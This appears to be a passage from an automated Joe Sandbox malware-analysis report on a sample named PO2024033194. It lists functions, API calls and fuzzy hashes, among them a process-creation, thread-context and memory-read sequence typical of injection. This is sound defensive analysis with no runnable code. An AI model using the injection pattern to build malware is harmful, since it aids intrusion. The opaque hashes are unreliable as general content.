                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentTerminate
                                                                  • String ID: #v
                                                                  • API String ID: 2429186680-554117064
                                                                  • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                  • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                  • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                  • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                  Function 04164370 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 04164B2B
                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04164BC1
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04164BE3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2170735362.0000000004163000.00000040.00000020.00020000.00000000.sdmp, Offset: 04163000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_4163000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 2438371351-0
                                                                  • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                  • Instruction ID: 0acfc4c6b37cce24ed935d448a4a7edceb59c836668251dd4137f1ca3f9da0d0
                                                                  • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                  • Instruction Fuzzy Hash: 7862FF30A14258DBEB24CFA4C850BDEB376EF58300F1091A9D50DEB394E779AE91CB59
                                                                  Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: Error:
                                                                  • API String ID: 4104443479-232661952
                                                                  • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                  • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                  • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                  • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                  Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                    • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                    • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                    • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                    • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                    • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                    • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                  • String ID: X$pWH
                                                                  • API String ID: 85490731-941433119
                                                                  • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                  • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                  • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                  • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                  Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                  • _memmove.LIBCMT ref: 00401B57
                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                  • String ID: @EXITCODE
                                                                  • API String ID: 2734553683-3436989551
                                                                  • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                  • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                  • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                  • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                  Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                  • String ID:
                                                                  • API String ID: 1794320848-0
                                                                  • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                  • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                  • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                  • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                  Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _malloc.LIBCMT ref: 0043214B
                                                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                  • _malloc.LIBCMT ref: 0043215D
                                                                  • _malloc.LIBCMT ref: 0043216F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _malloc$AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 680241177-0
                                                                  • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                  • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                  • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                  • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                  Function 0040F570 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                  • _free.LIBCMT ref: 004295A0
                                                                    • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                    • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                    • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                    • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                    • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                    • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                  • String ID: >>>AUTOIT SCRIPT<<<
                                                                  • API String ID: 3938964917-2806939583
                                                                  • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                  • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                  • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                  • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                  Function 00410100 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _strcat
                                                                  • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                  • API String ID: 1765576173-2684727018
                                                                  • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                  • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                  • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                  • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                  Function 00467897 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __wsplitpath.LIBCMT ref: 004678F7
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                  • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast__wsplitpath_malloc
                                                                  • String ID:
                                                                  • API String ID: 4163294574-0
                                                                  • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                  • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                  • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                  • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                  Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                    • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                    • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                  • _strcat.LIBCMT ref: 0040F786
                                                                    • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                    • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                  • String ID:
                                                                  • API String ID: 3199840319-0
                                                                  • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                  • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                  • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                  • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                  Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                  • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                  • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                  • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                  • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                  Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                  • __lock_file.LIBCMT ref: 00414A8D
                                                                    • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                  • __fclose_nolock.LIBCMT ref: 00414A98
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                  • String ID:
                                                                  • API String ID: 2800547568-0
                                                                  • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                  • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                  • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                  • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                  Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __lock_file.LIBCMT ref: 00415012
                                                                  • __ftell_nolock.LIBCMT ref: 0041501F
                                                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                  • String ID:
                                                                  • API String ID: 2999321469-0
                                                                  • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                  • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                  • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                  • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                  Function 0416436D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 04164B2B
                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04164BC1
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04164BE3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2170735362.0000000004163000.00000040.00000020.00020000.00000000.sdmp, Offset: 04163000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_4163000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 2438371351-0
                                                                  • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                  • Instruction ID: dc7792b5aee30b79a1d1705acda5beaf20d91b9f77fa4ea5e335e5f90369d436
                                                                  • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                  • Instruction Fuzzy Hash: 4312D024E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A4E77A5F91CF5A
